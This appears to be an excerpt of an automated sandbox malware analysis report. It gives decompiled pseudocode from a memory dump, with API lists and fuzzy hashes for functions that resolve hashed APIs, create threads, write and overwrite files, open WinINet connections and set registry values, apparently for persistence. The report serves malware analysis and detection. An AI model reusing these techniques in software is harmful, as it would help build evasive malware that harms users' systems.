							_t53 = _v28(_t88, _t52, _t51, 0xf01ff, 0x110, 2, 0,  &_v1278, 0, 0, 0, 0, 0);
							__eflags = _t53;
							if(__eflags != 0) {
								_t57 = E0009BF50(__eflags, 9, 0x48eed75);
								_t108 = _t108 + 8;
								 *_t57(_t53);
							}
							_t54 = E00099D50(0x647400a5);
							_t56 = E0009BF50(__eflags, _t54, E00099D50(0x60faedd9));
							_t105 = _t108 + 0x10;
							_t47 =  *_t56(_t88);
						}
					} else {
						_t63 = E00097200(0xb0c50,  &_v238);
						_t112 = _t103 + 8;
						_t119 =  *((char*)(_t90 + 0x18));
						_v24 = _t63;
						if( *((char*)(_t90 + 0x18)) == 0) {
							_t64 = E0009BA30(__eflags, _t87);
							_t113 = _t112 + 4;
						} else {
							_t67 = E00097200(0xb0840,  &_v124);
							_t68 = E00099D50(0x647402a4);
							_t84 =  &_v1278;
							_t87 =  &_v1278;
							_t64 = E000AD650(_t68, _t84, _t68, _t67,  &_v1278);
							_t113 = _t112 + 0x1c;
						}
						_t47 = E000A2450(_t119, 0x80000001, _v24, E000AFCF0(_t90), _t87, _t64);
						_t105 = _t113 + 0x14;
					}
					return _t47;
				} else {
					__eax = E0009BF50(__eflags, 0, 0xa0733d4);
					__eax = CreateThread(0, 0, E0009BE30, __esi, 0, 0); // executed
					__esp = __esp + 4;
					return __eax;
				}
			}

0x000a58d0
0x000a58d6
0x000a58d7
0x000a58da
0x000a58dc
0x000a58de
0x000a58ed
0x000a58ef
0x000a58f7
0x000a58fc
0x000a58fc
0x000a5900
0x000a5908
0x000a590d
0x000a591b
0x000a5920
0x000a5923
0x000a5925
0x000a594e
0x000a5950
0x000a5953
0x000a5954
0x000a5955
0x000a5956
0x000a223c
0x000a2241
0x000a2246
0x000a2250
0x000a225f
0x000a2268
0x000a227a
0x000a227f
0x000a2284
0x000a22e4
0x000a22f4
0x000a22f9
0x000a22fe
0x000a2301
0x000a2303
0x000a2309
0x000a230d
0x000a2310
0x000a236f
0x000a2374
0x000a2312
0x000a2331
0x000a2336
0x000a2336
0x000a237e
0x000a2383
0x000a2388
0x000a238b
0x000a2394
0x000a23ba
0x000a23be
0x000a23c1
0x000a23c3
0x000a23ce
0x000a23d3
0x000a23d7
0x000a23d7
0x000a23de
0x000a23f7
0x000a23fc
0x000a2400
0x000a2400
0x000a2286
0x000a2292
0x000a2297
0x000a229a
0x000a229e
0x000a22a1
0x000a233c
0x000a2341
0x000a22a7
0x000a22b0
0x000a22bf
0x000a22c7
0x000a22d1
0x000a22d3
0x000a22d8
0x000a22d8
0x000a2358
0x000a235d
0x000a235d
0x000a240c
0x000a5927
0x000a592e
0x000a5944
0x000a5946
0x000a594d
0x000a594d

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0000BE30,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 000A5944

Strings

7, xrefs: 000A58D7

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateThread
String ID: 7
API String ID: 2422867632-2497961398
Opcode ID: 53359471cf68dd602f82b61dd4ba48720037d418cabb661f57922f2fe40ad8d7
Instruction ID: 7b4959f3ddd8a6a0327100069a87490279bf89a23305e98a9d85f32ef9685855
Opcode Fuzzy Hash: 53359471cf68dd602f82b61dd4ba48720037d418cabb661f57922f2fe40ad8d7
Instruction Fuzzy Hash: DE01F7A6B8425436E92061E93C13FFF7A584B92B75F080075FA5D9A2C3E8416614A2F3

Uniqueness

Uniqueness Score: -1.00%

Function 000A9600, Relevance: 3.1, APIs: 2, Instructions: 93
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E000A9600(void* __eax, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v20;
				long _t8;
				long _t9;
				long _t10;
				void* _t11;
				intOrPtr* _t20;
				int _t22;
				signed char _t24;
				long _t25;
				void* _t28;
				void* _t30;
				void* _t31;
				void* _t35;

				_push(__eax);
				E0009BF50(__eflags, 0, 0xad68947);
				_t8 = E00099D50(0x247400ac);
				_t9 = E00099D50(0x647400ae);
				_t10 = E00099D50(0x6474002c);
				_t35 = _t31 + 0x14;
				_t11 = CreateFileW(_a4, _t8, 1, 0, _t9, _t10, 0); // executed
				if(_t11 == 0xffffffff) {
					_t24 = 0;
					L9:
					return E00093660(_t46, E00095080(_t46, 0x48, E00092FE0(_t11, _t46, 0x48, 0xff) & 0x000000ff) & _t24 & 0x000000ff, 0) & 0x00000001;
				}
				_t28 = _a8;
				_t30 = _t11;
				if(_t28 == 0) {
					L4:
					_t24 = 1;
					L7:
					_t20 = E0009BF50(_t45, 0, E00099D50(0x6ffa7d19));
					_t35 = _t35 + 0xc;
					_t11 =  *_t20(_t30);
					_t46 = _t24;
					if(_t24 == 0) {
						_t11 = E000AAE30(_t46, _a4);
						_t35 = _t35 + 4;
					}
					goto L9;
				}
				_t25 = _a12;
				_t44 = _t25;
				if(_t25 == 0) {
					goto L4;
				}
				E0009BF50(_t44, 0, 0xabb2b5);
				_t35 = _t35 + 8;
				_t22 = WriteFile(_t30, _t28, _t25,  &_v20, 0); // executed
				_t45 = _t22;
				if(_t22 == 0) {
					_t24 = 0;
					__eflags = 0;
					goto L7;
				}
				goto L4;
			}

0x000a9606
0x000a960e
0x000a961d
0x000a962c
0x000a963b
0x000a9640
0x000a964f
0x000a9654
0x000a9688
0x000a96b8
0x000a96ee
0x000a96ee
0x000a9656
0x000a9659
0x000a965d
0x000a9684
0x000a9684
0x000a968e
0x000a969e
0x000a96a3
0x000a96a7
0x000a96a9
0x000a96ab
0x000a96b0
0x000a96b5
0x000a96b5
0x00000000
0x000a96ab
0x000a965f
0x000a9662
0x000a9664
0x00000000
0x00000000
0x000a966d
0x000a9672
0x000a967e
0x000a9680
0x000a9682
0x000a968c
0x000a968c
0x00000000
0x000a968c
0x00000000

APIs

CreateFileW.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 000A964F
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,00000000,00000000,?,?,00000000), ref: 000A967E

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction ID: 5c71efaef33510c642e86e5f8567699476e48a8fd670ed4884abaec6fda91150
Opcode Fuzzy Hash: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction Fuzzy Hash: 0E2196E6A802053AEE1125B46C53FBE31488FA2759F1A0434FE085A283F9929A1856B3

Uniqueness

Uniqueness Score: -1.00%

Function 000AB790, Relevance: 3.1, APIs: 2, Instructions: 91
networkCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E000AB790(void* __eflags, intOrPtr _a4, char* _a8, signed short _a12, signed int _a16) {
				void* _t10;
				void* _t12;
				intOrPtr* _t14;
				signed int _t18;
				void* _t19;
				void* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				signed int _t31;
				char* _t32;
				void* _t36;
				void* _t37;
				void* _t38;

				_t30 = _a4;
				E0009BF50(__eflags, 0x13, 0xd0ca371);
				_t38 = _t37 + 8;
				_t26 =  !=  ? _t30 : 0xb0580;
				_t10 = InternetOpenA( !=  ? _t30 : 0xb0580,  !_a16 & 0x00000001, 0, 0, 0); // executed
				if(_t10 == 0) {
					L6:
					return 0;
				}
				_t36 = _t10;
				_t31 = 0;
				do {
					_t12 = E00099D50(0x647400bf);
					_t14 = E0009BF50(0, _t12, E00099D50(0x61c0d6ad));
					 *_t14(_t36,  *((intOrPtr*)(0xb07fc + _t31 * 8)), 0xb0800 + _t31 * 8, 4);
					_t18 = E00091460(0, E000922E0(0, _t31, 0x6ac13eca) + 1, 0x6ac13eca);
					_t38 = _t38 + 0x20;
					_t31 = _t18;
					_t50 = _t18 - 3;
				} while (_t18 != 3);
				_t32 = _a8;
				_t19 = E0009ABC0(_t50, _t32);
				_t20 = 0;
				_t51 = _t19;
				if(_t19 > 0) {
					E0009BF50(_t51, 0x13, 0xae775e1);
					_t20 = InternetConnectA(_t36, _t32, _a12 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
					if(0 == 0) {
						_t22 = E0009BF50(0, 0x13, 0x714b685);
						 *_t22(_t36);
						goto L6;
					}
				}
				return _t20;
			}

0x000ab799
0x000ab7a5
0x000ab7aa
0x000ab7b7
0x000ab7c2
0x000ab7c6
0x000ab87a
0x00000000
0x000ab87a
0x000ab7cc
0x000ab7ce
0x000ab7d0
0x000ab7d5
0x000ab7ee
0x000ab808
0x000ab81f
0x000ab824
0x000ab827
0x000ab829
0x000ab829
0x000ab82e
0x000ab832
0x000ab83c
0x000ab83e
0x000ab840
0x000ab849
0x000ab862
0x000ab866
0x000ab86f
0x000ab878
0x00000000
0x000ab878
0x000ab866
0x000ab880

APIs

InternetOpenA.WININET(000B0580,?,00000000,00000000,00000000,?,0009CD77,?,?,?,00000001,00000000,?,0009CD77,?,00000001), ref: 000AB7C2
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000AB862

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Internet$ConnectOpen
String ID:
API String ID: 2790792615-0
Opcode ID: c710bd5e375eb3946b5df87314f6134a6c14a58f37a832ce665747257abeea6c
Instruction ID: a3e35fedb128c82c0eec56d3c8d5161dcb093d70ff9315ceccde59e533e68921
Opcode Fuzzy Hash: c710bd5e375eb3946b5df87314f6134a6c14a58f37a832ce665747257abeea6c
Instruction Fuzzy Hash: 5E21EEB6B4020536FE2066757C23FBF35498B92759F150034FA09A6183FE91EA0155B2

Uniqueness

Uniqueness Score: -1.00%

Function 000921E0, Relevance: 3.1, APIs: 2, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000921E0(intOrPtr _a4, void* _a8, short* _a12, short* _a16, signed char _a20, signed char _a24) {
				void* _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				int _v36;
				long _t20;
				int _t25;
				long _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				long _t32;
				long _t33;
				void* _t42;
				void* _t43;
				void* _t47;

				E0009BF50(_t47, 9, 0x7b43ce7);
				_t43 = _t42 + 8;
				_t20 = RegCreateKeyExW(_a8, _a12, 0, 0, 0, 4, 0,  &_v20, 0); // executed
				if(_t20 == 0) {
					_t32 = 0x64;
					_v28 = _a24 & 0x000000ff;
					_v24 = _a20 & 0x000000ff;
					do {
						E00095CD0(__eflags, _a4, _a16, _v24, _v28);
						E0009BF50(__eflags, 9, 0x7b43ce7);
						_t25 = E00099D50(0x647400af);
						_t43 = _t43 + 0x1c;
						_t26 = RegCreateKeyExW(_v20, _a16, 0, 0, 0, _t25, 0,  &_v32,  &_v36); // executed
						__eflags = _t26;
						if(__eflags != 0) {
							goto L3;
						} else {
							_t30 = E0009BF50(__eflags, 9, 0x3111c69);
							_t43 = _t43 + 8;
							 *_t30(_v32);
							__eflags = _v36 - 1;
							if(__eflags != 0) {
								goto L3;
							} else {
								_t33 = 1;
							}
						}
						L8:
						_t27 = E0009BF50(__eflags, 9, 0x3111c69);
						 *_t27(_v20);
						goto L9;
						L3:
						_t32 = _t32 - 1;
						__eflags = _t32;
					} while (__eflags != 0);
					_t33 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t33 = 0;
				}
				L9:
				return _t33;
			}

0x000921f6
0x000921fb
0x00092210
0x00092214
0x00092225
0x0009222a
0x0009222d
0x00092243
0x00092250
0x0009225f
0x00092271
0x00092276
0x0009228e
0x00092290
0x00092292
0x00000000
0x00092294
0x0009229b
0x000922a0
0x000922a6
0x000922a8
0x000922ac
0x00000000
0x000922ae
0x000922ae
0x000922ae
0x000922ac
0x000922b4
0x000922bb
0x000922c6
0x00000000
0x00092240
0x00092240
0x00092240
0x00092240
0x000922b2
0x000922b2
0x00000000
0x00092216
0x00092216
0x00092216
0x000922c8
0x000922d1

APIs

RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00092210
RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0009228E

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction ID: fb471403ba7db389b86e66c56b0c3150b843541ae7cfc357d9a195603fbaec2f
Opcode Fuzzy Hash: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction Fuzzy Hash: E92186B2A403197FEF21AB909D53FFE7664AB15B10F140034FA14762D2E6A1A924E6B1

Uniqueness

Uniqueness Score: -1.00%

Function 000A5420, Relevance: 3.1, APIs: 2, Instructions: 72
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E000A5420(WCHAR* _a4) {
				void* _t4;
				signed char _t5;
				long _t7;
				intOrPtr* _t10;
				intOrPtr* _t12;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;
				WCHAR* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t23;

				_t18 = _a4;
				_t17 = 0;
				while(1) {
					E0009BF50(0, 0, 0xad68947);
					_t4 = CreateFileW(_t18, 0x40000000, 7, 0, 2, 0x4000000, 0); // executed
					_t19 = _t4;
					_t5 = E00094A90(_t4, 0);
					_t22 = _t20 + 0x10;
					_t28 = _t5 & 0x00000001;
					if((_t5 & 0x00000001) == 0) {
						_t15 = E0009BF50(_t28, 0, 0xb8e7db5);
						_t22 = _t22 + 8;
						 *_t15(_t19);
					}
					E0009BF50(_t28, 0, 0xbf8ba27);
					_t23 = _t22 + 8;
					_t7 = GetFileAttributesW(_t18); // executed
					_t29 = _t7 - 0xffffffff;
					if(_t7 == 0xffffffff) {
						break;
					}
					_t10 = E0009BF50(_t29, 0, 0xad64007);
					 *_t10(_t18);
					_t12 = E0009BF50(_t29, 0, 0x7a2bc0);
					 *_t12(0xbb8);
					_t17 = _t17 + 1;
					_t14 = E00099D50(0x647400a6);
					_t20 = _t23 + 0x14;
					if(_t17 != _t14) {
						continue;
					}
					break;
				}
				E0009B570(_t18);
				return 0;
			}

0x000a5426
0x000a5429
0x000a5430
0x000a5437
0x000a5452
0x000a5454
0x000a5459
0x000a545e
0x000a5461
0x000a5463
0x000a546c
0x000a5471
0x000a5475
0x000a5475
0x000a547e
0x000a5483
0x000a5487
0x000a5489
0x000a548c
0x00000000
0x00000000
0x000a5495
0x000a549e
0x000a54a7
0x000a54b4
0x000a54b6
0x000a54bc
0x000a54c1
0x000a54c6
0x00000000
0x00000000
0x00000000
0x000a54c6
0x000a54cd
0x000a54db

APIs

CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,04000000,00000000), ref: 000A5452
GetFileAttributesW.KERNEL32(?), ref: 000A5487

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
Instruction ID: 59e9257859e20cd102f1783b0292012910d8ac744406bdd59104b605c7079ea9
Opcode Fuzzy Hash: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
Instruction Fuzzy Hash: 67014CA6A8420436E96032B43D53FBE31584BA6F2FF150130FA5CA91C3FAC57A1524B7

Uniqueness

Uniqueness Score: -1.00%

Function 000A3D80, Relevance: 3.1, APIs: 2, Instructions: 72
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000A3D80(void* __eflags, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
				void* _t12;
				signed char _t13;
				void* _t14;
				long _t17;
				void* _t18;
				signed int _t21;
				intOrPtr* _t22;
				char* _t28;
				signed int _t29;

				_t44 = __eflags;
				_t13 = E000A5000(_t12, __eflags, 0xffffffff);
				_t14 = E00099D50(0x647400a5);
				E0009BF50(_t44, _t14, E00099D50(0x63c03c4b));
				_t17 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, (_t13 & 0x000000ff) << 0x00000008 | 0x00000002, 0,  &_a4, 0); // executed
				if(_t17 == 0) {
					_t28 = _a20;
					_t18 = E00099D50(0x647400a5);
					E0009BF50(__eflags, _t18, E00099D50(0x69a6701b));
					_t21 = RegSetValueExW(_a4, _a12, 0, _a16, _t28, _a24); // executed
					__eflags = _t21;
					_t10 = _t21 == 0;
					__eflags = _t10;
					_t29 = _t28 & 0xffffff00 | _t10;
					_t22 = E0009BF50(_t10, 9, 0x3111c69);
					 *_t22(_a4);
				} else {
					_t29 = 0;
				}
				return _t29;
			}

0x000a3d80
0x000a3d8b
0x000a3da1
0x000a3dba
0x000a3dd5
0x000a3dd9
0x000a3ddf
0x000a3dea
0x000a3e03
0x000a3e18
0x000a3e1a
0x000a3e1c
0x000a3e1c
0x000a3e1c
0x000a3e26
0x000a3e31
0x000a3ddb
0x000a3ddb
0x000a3ddb
0x000a3e39

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,?,00000002,?,00000000), ref: 000A3DD5
RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 000A3E18

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateValue
String ID:
API String ID: 2259555733-0
Opcode ID: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction ID: 34f914742957e9b3a923979f7d0b4f0d0f3ef5a07ae0aaef82da9af9b250b3e3
Opcode Fuzzy Hash: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction Fuzzy Hash: 3E1106B69002443FEF116AA4AC93FEF360CDB52769F150034FE1895293E651EA2496F3

Uniqueness

Uniqueness Score: -1.00%

Function 0009AD80, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0009AD80(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _v16;
				long _v20;
				void* _t10;
				intOrPtr* _t12;
				void* _t13;
				void* _t15;
				int _t19;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t30;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v20 = 0;
				_v16 = 0;
				_t10 = E00099D50(0x647400a5);
				_t12 = E0009BF50(_t33, _t10, E00099D50(0x6b5f7e12));
				_t30 = _t27 + 0x10;
				_t13 =  *_t12(_a4, 8,  &_v16);
				_t34 = _t13;
				if(_t13 == 0) {
					_t26 = 0;
					__eflags = 0;
					L7:
					return _t26;
				}
				_t24 = _a8;
				_t15 = E000AB530(_t13, _t34, _v16); // executed
				_t31 = _t30 + 4;
				_t26 = _t15;
				if(_t24 != 0) {
					_t36 = _t26;
					if(_t26 != 0) {
						E0009BF50(_t36, 9, 0xbd557e);
						_t31 = _t31 + 8;
						_t19 = GetTokenInformation(_v16, 0xc, _t24, 4,  &_v20); // executed
						if(_t19 == 0) {
							E0009B570(_t26);
							_t31 = _t31 + 4;
							_t26 = 0;
						}
					}
				}
				E0009BF50(0, 0, 0xb8e7db5);
				CloseHandle(_v16); // executed
				goto L7;
			}

0x0009ad80
0x0009ad8b
0x0009ad92
0x0009ad9e
0x0009adb7
0x0009adbc
0x0009adc6
0x0009adc8
0x0009adca
0x0009ae26
0x0009ae26
0x0009ae28
0x0009ae30
0x0009ae30
0x0009adcc
0x0009add2
0x0009add7
0x0009adda
0x0009adde
0x0009ade0
0x0009ade2
0x0009adeb
0x0009adf0
0x0009adff
0x0009ae03
0x0009ae06
0x0009ae0b
0x0009ae0e
0x0009ae0e
0x0009ae03
0x0009ade2
0x0009ae17
0x0009ae22
0x00000000

APIs

Part of subcall function 000AB530: GetTokenInformation.KERNELBASE(0009ADD7,00000001,00000000,00000000,?,0009ADD7,00000000), ref: 000AB55A
Part of subcall function 000AB530: GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000AB5B5

GetTokenInformation.KERNELBASE(00000000,0000000C,00000000,00000004,?), ref: 0009ADFF

Part of subcall function 0009B570: HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

CloseHandle.KERNEL32(00000000), ref: 0009AE22

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: InformationToken$CloseFreeHandleHeap
String ID:
API String ID: 2052167596-0
Opcode ID: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
Instruction ID: b37742305f65ce12f0e32efa7ea092cefdbb4e05abe4ea9711172d8814755a93
Opcode Fuzzy Hash: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
Instruction Fuzzy Hash: 5911C676E0011877EF2166A4BC12BAF76689F52B14F054134FD1866242FB71AA2496E3

Uniqueness

Uniqueness Score: -1.00%

Function 000AB530, Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000AB530(void* __eax, void* __eflags, void* _a4) {
				long _v20;
				int _t11;
				signed char _t16;
				void* _t17;
				int _t19;
				DWORD* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;

				_v20 = 0;
				E0009BF50(__eflags, 9, 0xbd557e);
				_t25 = _t24 + 8;
				_t21 =  &_v20;
				_t11 = GetTokenInformation(_a4, 1, 0, 0, _t21); // executed
				_t23 = 0;
				_t30 = _t11;
				if(_t11 == 0) {
					_t16 = E000955C0( *((intOrPtr*)(E0009BF50(_t30, 0, E00099D50(0x68042b4e))))(), 0x7a);
					_t25 = _t25 + 0x14;
					if((_t16 & 0x00000001) != 0) {
						_t17 = E00098290(_v20);
						_t25 = _t25 + 4;
						_t32 = _t17;
						if(_t17 != 0) {
							_t22 = _t17;
							E0009BF50(_t32, 9, 0xbd557e);
							_t25 = _t25 + 8;
							_t19 = GetTokenInformation(_a4, 1, _t22, _v20, _t21); // executed
							_t23 = _t22;
							if(_t19 == 0) {
								E0009B570(_t22);
								_t25 = _t25 + 4;
								_t23 = 0;
							}
						}
					}
				}
				return _t23;
			}

0x000ab537
0x000ab545
0x000ab54a
0x000ab54d
0x000ab55a
0x000ab55c
0x000ab55e
0x000ab560
0x000ab57f
0x000ab584
0x000ab589
0x000ab58e
0x000ab593
0x000ab596
0x000ab598
0x000ab59a
0x000ab5a3
0x000ab5a8
0x000ab5b5
0x000ab5b9
0x000ab5bb
0x000ab5be
0x000ab5c3
0x000ab5c6
0x000ab5c6
0x000ab5bb
0x000ab598
0x000ab589
0x000ab5d1

APIs

GetTokenInformation.KERNELBASE(0009ADD7,00000001,00000000,00000000,?,0009ADD7,00000000), ref: 000AB55A

Part of subcall function 00098290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000982E8

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000AB5B5

Part of subcall function 0009B570: HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: HeapInformationToken$AllocateFreeLibraryLoad
String ID:
API String ID: 4190244075-0
Opcode ID: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
Instruction ID: c02346bfaffdcde126331413b0063d1c4020c592f3f22175bb62d888ac9fafc5
Opcode Fuzzy Hash: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
Instruction Fuzzy Hash: 1E01C872E8071836EE6165F47C43FBF7D5D9F52B59F050030F90CA5193F6929A1491A2

Uniqueness

Uniqueness Score: -1.00%

Function 0009E030, Relevance: 3.1, APIs: 2, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0009E030(void* __eflags, void* _a4, short* _a8, short* _a12) {
				void* _t9;
				long _t12;
				signed int _t14;
				intOrPtr* _t15;
				int _t20;
				signed int _t21;

				_t31 = __eflags;
				_t20 = (E000A5000(_t9, __eflags, 0xffffffff) & 0x000000ff) << 0x00000008 | 0x00000001;
				E0009BF50(_t31, 9, 0xda29a27);
				_t12 = RegOpenKeyExW(_a4, _a8, 0, _t20,  &_a4); // executed
				if(_t12 == 0) {
					E0009BF50(__eflags, 9, 0x8097c7);
					_t14 = RegQueryValueExW(_a4, _a12, 0, 0, 0, 0); // executed
					__eflags = _t14;
					_t7 = _t14 == 0;
					__eflags = _t7;
					_t21 = _t20 & 0xffffff00 | _t7;
					_t15 = E0009BF50(_t7, 9, 0x3111c69);
					 *_t15(_a4);
				} else {
					_t21 = 0;
				}
				return _t21;
			}

0x0009e030
0x0009e04c
0x0009e056
0x0009e067
0x0009e06b
0x0009e07b
0x0009e08f
0x0009e091
0x0009e093
0x0009e093
0x0009e093
0x0009e09d
0x0009e0a8
0x0009e06d
0x0009e06d
0x0009e06d
0x0009e0b0

APIs

RegOpenKeyExW.KERNEL32(00000000,80000001,00000000,00000000,?,?,?,?), ref: 0009E067
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 0009E08F

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: OpenQueryValue
String ID:
API String ID: 4153817207-0
Opcode ID: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction ID: 78661935677944fcadbb7ef02a500823dea520f1cf60ceb67f17524cb1b54881
Opcode Fuzzy Hash: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction Fuzzy Hash: 3601F9776803183EEF1059A5AC53FEA3608DB81B65F140130FE1CAA1C3EAD1FA1596F1

Uniqueness

Uniqueness Score: -1.00%

Function 00093F90, Relevance: 3.1, APIs: 2, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00093F90(void* _a4, intOrPtr _a8) {
				intOrPtr _t4;
				long _t8;
				void* _t10;
				void* _t14;
				void* _t15;
				long _t17;

				_t4 = _a8;
				_t25 = _t4;
				if(_t4 == 0) {
					return 0;
				}
				_t8 = E000922E0(_t25, E00091460(_t25, _t4, 0x8f5419a3) + 4, 0x8f5419a3);
				_t26 = _a4;
				_t17 = _t8;
				if(_a4 == 0) {
					E0009BF50(__eflags, 0, 0x8685de3);
					_t10 = RtlAllocateHeap( *0xb2124, 8, _t17); // executed
					return _t10;
				}
				E0009BF50(_t26, 0, E00099D50(0x6caeab8f));
				_t15 =  *0xb2124; // 0x750000
				_t14 = RtlReAllocateHeap(_t15, E00099D50(0x647400a4), _a4, _t17); // executed
				return _t14;
			}

0x00093f96
0x00093f99
0x00093f9b
0x00000000
0x00093ffb
0x00093fb4
0x00093fbc
0x00093fc0
0x00093fc2
0x00094006
0x00094017
0x00000000
0x00094017
0x00093fd4
0x00093fdc
0x00093ff7
0x00000000

APIs

RtlReAllocateHeap.NTDLL(00750000,00000000,00000000,00000000), ref: 00093FF7
RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00094017

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 47756d77778bd37679b19cedd15490441639e744638df791e2f3920e79aaed9f
Instruction ID: 59310788cf4f6075fd4ca10262006a59aba758a0c958dda9fa40e88a89838614
Opcode Fuzzy Hash: 47756d77778bd37679b19cedd15490441639e744638df791e2f3920e79aaed9f
Instruction Fuzzy Hash: 9801F9B6D041047BEE102274FC13FAE369C9B653ADF050430FD0DA1203F9619B14AAF2

Uniqueness

Uniqueness Score: -1.00%

Function 000A9C40, Relevance: 2.5, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A9C40(void* __eflags, void** _a4) {
				int _t6;
				int _t8;
				void** _t10;
				void* _t11;
				void* _t12;

				_t10 = _a4;
				_t6 = E00094A90( *_t10, 0);
				_t12 = _t11 + 8;
				_t15 = _t6 & 0x00000001;
				if((_t6 & 0x00000001) == 0) {
					E0009BF50(_t15, 0, 0xb1fd105);
					_t12 = _t12 + 8;
					_t6 = VirtualFree( *_t10, 0, 0x8000); // executed
				}
				_t16 = _t10[2];
				if(_t10[2] != 0) {
					E0009BF50(_t16, 0, 0xb8e7db5);
					_t8 = CloseHandle(_t10[2]); // executed
					return _t8;
				}
				return _t6;
			}

0x000a9c44
0x000a9c4b
0x000a9c50
0x000a9c53
0x000a9c55
0x000a9c5e
0x000a9c63
0x000a9c6f
0x000a9c6f
0x000a9c71
0x000a9c75
0x000a9c7e
0x000a9c89
0x00000000
0x000a9c89
0x000a9c8d

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C6F
